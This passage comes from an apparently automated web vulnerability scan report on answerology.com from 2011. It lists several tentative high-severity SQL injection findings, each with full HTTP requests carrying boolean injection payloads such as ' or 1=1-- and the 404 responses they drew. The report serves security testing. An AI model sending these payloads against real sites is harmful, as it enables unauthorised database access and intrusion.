<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cssjs'%20and%201%3d2--%20/CharacterCounter.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:33 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

1.33. http://www.answerology.com/cssjs/CoachesLayout.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.answerology.com
Path:	/cssjs/CoachesLayout.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 18708381'%20or%201%3d1--%20 and 18708381'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cssjs/CoachesLayout.js18708381'%20or%201%3d1--%20?v=1648503221 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmv=191590138.hearst%3Alogged%20out; __utma=191590138.125975609.1316294747.1316294747.1316294747.1; __utmb=191590138; __utmc=191590138; __utmz=191590138.1316294747.1.1.utmccn=(referral)|utmcsr=hearst.com|utmcct=/newspapers/metrix4media.php|utmcmd=referral; rsi_segs=; s_ppv=64

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:43:01 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cssjs/CoachesLayout.js18708381'%20or%201%3d2--%20?v=1648503221 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmv=191590138.hearst%3Alogged%20out; __utma=191590138.125975609.1316294747.1316294747.1316294747.1; __utmb=191590138; __utmc=191590138; __utmz=191590138.1316294747.1.1.utmccn=(referral)|utmcsr=hearst.com|utmcct=/newspapers/metrix4media.php|utmcmd=referral; rsi_segs=; s_ppv=64

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:43:01 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

1.34. http://www.answerology.com/cssjs/countdownTimer.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.answerology.com
Path:	/cssjs/countdownTimer.js

Issue detail

Request 1

GET /cssjs'%20and%201%3d1--%20/countdownTimer.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:40 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /cssjs'%20and%201%3d2--%20/countdownTimer.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:40 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

1.35. http://www.answerology.com/cssjs/countdownTimer.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.answerology.com
Path:	/cssjs/countdownTimer.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 23080796'%20or%201%3d1--%20 and 23080796'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cssjs/countdownTimer.js23080796'%20or%201%3d1--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:43 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /cssjs/countdownTimer.js23080796'%20or%201%3d2--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:43 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

1.36. http://www.answerology.com/index.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.answerology.com
Path:	/index.aspx

Issue detail

Request 1

GET /index.aspx'%20and%201%3d1--%20?template=ads.ascx&topic=homepage&tile=1 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:28:03 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /index.aspx'%20and%201%3d2--%20?template=ads.ascx&topic=homepage&tile=1 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:28:04 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
